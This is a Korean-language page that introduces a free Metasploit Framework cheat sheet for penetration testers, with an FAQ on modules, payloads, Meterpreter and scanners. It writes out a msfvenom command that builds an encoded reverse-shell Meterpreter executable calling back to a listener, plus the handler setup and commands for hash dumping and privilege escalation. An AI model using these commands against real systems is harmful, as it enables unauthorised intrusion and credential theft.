Metasploit Reference
Metasploit 프레임워크 레퍼런스
Metasploit Reference 소개
Metasploit 레퍼런스는 Metasploit Framework 침투 테스트 플랫폼의 명령어를 모듈, Exploit, Payload, Meterpreter, 보조모듈, 포스트의 6개 카테고리로 정리한 검색 가능한 치트시트입니다. 각 항목에는 명령어 구문, 설명, 실제 보안 테스트에서 사용하는 예제가 포함됩니다.
msfconsole 시작, 모듈 검색(타입, 플랫폼, CVE, 이름별), use로 모듈 선택, set/setg 옵션 설정, show options, info, back 명령어 등 핵심 Metasploit 조작법을 다룹니다. Exploit 실행에는 run/exploit, 백그라운드 작업(-j), 취약점 확인(check), 세션 관리, multi/handler 리스너 설정이 포함됩니다.
msfvenom 페이로드 생성(EXE, 인코딩, staged vs stageless), Meterpreter 포스트 익스플로잇 명령어(sysinfo, getuid, shell, upload/download, hashdump, getsystem, migrate), 보조 스캐너(TCP 포트 스캔, SMB 버전, HTTP 디렉토리 스캔, SOCKS 프록시), 포스트 모듈(사용자 열거, 로컬 권한 상승 제안, 지속성, 자격 증명 수집, autoroute 피벗) 등 고급 주제를 포함합니다.
주요 기능
- 6개 카테고리에 걸친 34개 이상의 Metasploit Framework 명령어 레퍼런스
- 모듈 관리: msfconsole, search(타입/플랫폼/CVE/이름), use, show options, set/setg, info
- Exploit 실행: run/exploit, 백그라운드 작업(-j), 취약점 확인(check), 세션 관리, multi/handler
- 페이로드: msfvenom 생성, 인코더(shikata_ga_nai), staged vs stageless 페이로드 유형
- Meterpreter 명령어: sysinfo, getuid, shell, upload/download, hashdump, getsystem, migrate
- 보조 스캐너: TCP 포트 스캔, SMB 버전 탐지, HTTP 디렉토리 스캔, SOCKS 프록시
- 포스트 익스플로잇: 사용자 열거, 로컬 익스플로잇 제안, 지속성, 자격 증명 수집, autoroute
- 침투 테스트 중 빠른 명령어 조회를 위한 즉시 검색과 카테고리 필터링
자주 묻는 질문
이 Metasploit 치트시트는 어떤 내용을 다루나요?
모듈(msfconsole, search, use, info, show options, set/setg, back), Exploit(run/exploit, 백그라운드 작업, check, sessions, multi/handler), Payload(show payloads, set PAYLOAD, msfvenom, 인코더, staged vs stageless), Meterpreter(sysinfo, getuid, shell, upload/download, hashdump, getsystem, migrate), 보조모듈(TCP 포트 스캔, SMB 버전, HTTP 디렉토리 스캔, SOCKS 프록시), 포스트(사용자 열거, 권한 상승 제안, 지속성, 자격 증명, autoroute)의 6개 카테고리를 다룹니다.
Metasploit에서 모듈을 검색하는 방법은?
search 명령어에 필터를 사용합니다: search type:exploit platform:windows smb는 Windows SMB 익스플로잇을 찾습니다. search cve:2021-34527로 CVE 검색, search name:eternalblue로 이름 검색이 가능합니다. 검색 결과의 모듈 경로를 use 명령어로 선택합니다.
staged와 stageless 페이로드의 차이는 무엇인가요?
Staged 페이로드(windows/meterpreter/reverse_tcp, / 구분)는 작은 stager를 먼저 전송한 뒤 전체 페이로드를 다운로드합니다. Stageless 페이로드(windows/meterpreter_reverse_tcp, _ 구분)는 전체 페이로드를 한 번에 전송합니다. Staged는 크기가 작지만 안정적 연결이 필요하고, Stageless는 크기가 크지만 더 안정적입니다.
msfvenom으로 페이로드를 생성하는 방법은?
msfvenom -p <페이로드> LHOST=IP LPORT=포트 -f 형식 -o 출력파일 형태로 사용합니다. 예: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o shell.exe. -e x86/shikata_ga_nai -i 3으로 인코딩을 추가합니다. msfvenom -l payloads로 페이로드 목록, -l formats로 형식 목록을 확인합니다.
Meterpreter의 핵심 명령어는 무엇인가요?
sysinfo(시스템 정보), getuid(현재 사용자), shell(OS 쉘 획득), upload/download(파일 전송), hashdump(패스워드 해시 덤프), getsystem(SYSTEM 권한 상승), migrate PID(다른 프로세스 이동), ps(프로세스 목록), background(세션 유지하며 msfconsole 복귀) 등이 핵심 명령어입니다.
Metasploit 리스너를 설정하는 방법은?
exploit/multi/handler를 사용합니다: use exploit/multi/handler 후 set PAYLOAD windows/meterpreter/reverse_tcp, set LHOST 0.0.0.0, set LPORT 4444, exploit -j로 백그라운드 실행합니다. 생성된 페이로드의 들어오는 연결을 수신합니다.
스캐닝에 사용할 수 있는 보조 모듈은?
auxiliary/scanner/portscan/tcp는 서브넷 TCP 포트 스캔, auxiliary/scanner/smb/smb_version은 SMB 서비스 탐지, auxiliary/scanner/http/dir_scanner는 웹 디렉토리 열거, auxiliary/server/socks_proxy는 피벗을 위한 SOCKS 프록시 설정에 사용합니다.
이 레퍼런스는 무료인가요?
네, 완전 무료이며 회원가입이 필요 없습니다. 모든 콘텐츠가 브라우저에서 즉시 검색과 카테고리 필터링으로 사용 가능합니다. 이 레퍼런스는 인가된 침투 테스트와 보안 교육 목적으로만 사용해야 합니다. 데스크톱, 태블릿, 모바일에서 다크 모드와 함께 작동합니다.